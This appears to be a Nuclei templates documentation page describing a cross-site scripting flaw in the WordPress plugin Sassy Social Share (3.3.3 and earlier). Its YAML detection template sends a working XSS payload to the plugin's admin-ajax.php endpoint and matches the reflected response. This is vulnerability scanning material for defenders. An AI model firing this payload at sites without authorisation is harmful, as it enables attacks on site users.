Skip to content
Nuclei Templates

Sassy Social Share <=3.3.3 - Cross-Site Scripting

ID: sassy-social-share-xss

Severity: medium

Author: Random_Robbie

Tags: xss,wp,wpscan,wordpress,wp-plugin,sassy

Description

Section titled “Description”

WordPress Sassy Social Share 3.3.3 and prior is vulnerable to cross-site scripting because certain AJAX endpoints return JSON data with no Content-Type header set and then use the default text/html. In other words, any JSON that has HTML will be rendered as such.

YAML Source

Section titled “YAML Source”
id: sassy-social-share-xss


info:
  name: Sassy Social Share <=3.3.3 - Cross-Site Scripting
  author: Random_Robbie
  severity: medium
  description: |
    WordPress Sassy Social Share 3.3.3 and prior is vulnerable to cross-site scripting because certain AJAX endpoints return JSON data with no Content-Type header set and then use the default text/html. In other words, any JSON that has HTML will be rendered as such.
  reference:
    - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: xss,wp,wpscan,wordpress,wp-plugin,sassy


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]="


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '[{"<img src=x onerror=alert(document.domain)>":""}]'
          - 'facebook'
          - 'twitter'
        condition: and


      - type: word
        part: header
        words:
          - 'application/json'
        negative: true


      - type: status
        status:
          - 200
# digest: 4a0a00473045022079b4fd85d05432dc787dbc5370e233d84e3d798b35991ceddfdc26dafa7a564b0221008cc066dee3e9e6f4dba27a111f8e484c7aeff87c9ceb802cb0c183fcd6153d6e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/sassy-social-share.yaml"

View on Github